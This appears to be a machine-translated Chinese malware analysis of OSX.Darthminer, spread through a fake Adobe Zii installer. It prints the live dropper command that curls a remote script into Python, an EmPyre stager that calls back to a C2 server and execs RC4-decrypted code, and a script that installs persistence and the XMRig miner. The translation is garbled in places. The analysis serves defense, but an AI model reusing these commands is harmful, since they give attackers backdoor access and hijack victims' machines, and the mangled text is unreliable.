本周早些时候,我们发现了一种新的Mac恶意软件,它结合了两种不同的开源工具——emyre后门和XMRig加密器——目的是作恶。
该恶意软件是通过一个名为Adobe Zii的应用程序传播的。adobezii是一种旨在帮助各种Adobe应用程序盗版的软件。然而,在这个例子中,应用程序被称为Adobe Zii,但它肯定不是真正的东西。
从上面的截图可以看出,实际的Adobe Zii软件,在左边,使用的是Adobe Creative Cloud标志。(毕竟,如果你打算编写软件来帮助人们窃取Adobe的软件,为什么不把logo也偷走呢?)然而,恶意软件安装程序使用通用的Automator applet图标。
行为
使用Automator打开假冒Adobe Zii应用程序揭示了软件的性质,因为它只是运行Shell脚本:
卷曲https://ptpb.pw/jj9a |Python - &S = 46.226.108.171:80;卷曲$ s / sample.zip -o sample.zip;Unzip Sample.zip -d样本;CD样品;CD __Macosx;open -a sample.app.app.
这个脚本的目的是下载并执行Python脚本,然后下载并运行名为sample.app的应用程序。
sample.app很简单。它似乎只是成为Adobe Zii的一个版本,最有可能是为了使恶意软件实际上是“合法”的目的。(这并不意味着软件盗版是合法的,而是意味着恶意软件试图看起来像是在做什么用户认为它的意图。)
那么Python脚本呢?这被证明是模糊的,但很容易消除模糊,揭示了以下脚本:
import sys;import re, subprocess;cmd = "ps -ef | grep Little\ Snitch | grep -v grep" ps = subprocess. txt;Popen(cmd, shell=True, stdout=subprocess.PIPE) out= ps.stdout.read() ps.stdout.close() if re.search("Little Snitch", out): sys.exit() import urllib2;UA='Mozilla/5.0 (Windows NT 6.1;WOW64;三叉戟/ 7.0;房车:11.0)像壁虎;服务器= ' http://46.226.108.171:4444 '; t = ' / news.php”;要求= urllib2.Request(服务器+ t);req.add_header(“用户代理”,UA);req.add_header(“饼干”,“会话= SYDFioywtcFbUR5U3EST96SbqVk = ");代理= urllib2.ProxyHandler ();o = urllib2.build_opener(代理); urllib2.install_opener(o); a=urllib2.urlopen(req).read(); IV=a[0:4];data=a[4:];key=IV+'3f239f68a035d40e1891d8b5fdf032d3';S,j,out=range(256),0,[] for i in range(256): j=(j+S[i]+ord(key[i%len(key)]))%256 S[i],S[j]=S[j],S[i] i=j=0 for char in data: i=(i+1)%256 j=(j+S[i])%256 S[i],S[j]=S[j],S[i] out.append(chr(ord(char)^S[(S[i]+S[j])%256])) exec(''.join(out))
此脚本所做的第一件事是寻找小窃听的存在,这是一个普遍使用的传出防火墙,该防火墙将能够将后门的网络连接带到用户的注意力。如果存在小窃听,则恶意软件纾困。(当然,如果安装了Little Snectice的传出防火墙,那么它已经阻止了将尝试下载此脚本的连接,因此此时的检查是毫无价值的。)
这个脚本打开一个连接到EmPyre后端,它能够将任意命令推送到受感染的Mac。一旦后门打开,它接收一个命令,将以下脚本下载到/private/tmp/uploadm .sh并执行它:
#osascript -e“do shell script \”networksetup -setsecurewebproxy“wi-fi”46.226.108.171 8080 && networksetup -setwebproxy“wi-fi”46.226.108.171 8080 && curl -x http://46.226.108.171:8080 http://mitm.it/cert/pem -o iSseCurecert.pem && security add-trusted-cert -d -r trustroot -k /library/keychains/system.key.key.keychain iSecurecert.pem \ with Administrator Privileges“CD〜/ Library /Launchagents curl -o com.apple.rig.plist http://46.226.108.171/com.apple.rig.plist curl -o com.proxy.initialize.plist http://46.226.108.171/com.proxy.Initialize。plist launchctl load -w com.apple.rig.plist launchctl load -w com.proxy.initialize.plist cd / users / shared curl -o config.json http://46.226.108.171/46.226.108.171/46.226.08.171/46.226。://46.226.108.171/xmrig chmod + x ./xmrig rm -rf ./xmrig2 rm -rf ./config2.json ./xmrig -c config.json&
此脚本下载并安装恶意软件的其他组件。创建了一个名为com.proxy.initialize.plist的启动代理,通过运行前面提到的相同的模糊Python脚本来保持后门持续打开。
该脚本还将XMRig cryptominer和配置文件下载到/Users/Shared/文件夹中,并设置一个名为com.apple.rig.plist的启动代理,以保持XMRig进程在该配置处于活动状态时运行。(“com。苹果的名字是一个直接的危险信号,这是发现该恶意软件的根本原因。)
有趣的是,脚本中的代码可以下载并安装与mitmproxy软件相关联的根证书,mitmproxy软件能够拦截所有网络流量,包括(借助证书)加密的“https”流量。但是,该代码被注释掉了,表明它不是活动的。
从表面上看,这个恶意软件似乎是无害的。cryptominer通常只会导致计算机变慢,这要归功于一个吞噬所有CPU/GPU的进程。
然而,这不仅仅是一个密码大师。重要的是要记住,密码生成器是通过后门发出的命令安装的,而且过去很可能有其他任意命令通过后门发送到受感染的mac电脑。我们不可能确切地知道这个恶意软件可能会对受感染的系统造成什么损害。仅仅因为我们只观察了挖掘行为,并不意味着它从未做过其他事情。
影响
必威平台APP伪的Mac检测此恶意软件作为OSX.Darthminer。如果您是感染的话,除了加密之外,还不可能说别的恶意软件。它完全可能会有exfiltrated文件或捕获的密码。
从中学到一个重要的教训。众所周知,软件盗版是您可以在您的Mac上进行的最风险的活动之一。感染的危险很高,这不是新的,但人们仍然从事这种行为。请在将来帮自己一个忙,不要偷偷摸摸的软件。费用远远高于购买您试图免费获得的软件。
IOC.
Adobe Zii.app.zip SHA256: ebecdeac53069c9db1207b2e0d1110a73bc289e31b0d3261d903163ca4b1e31e
评论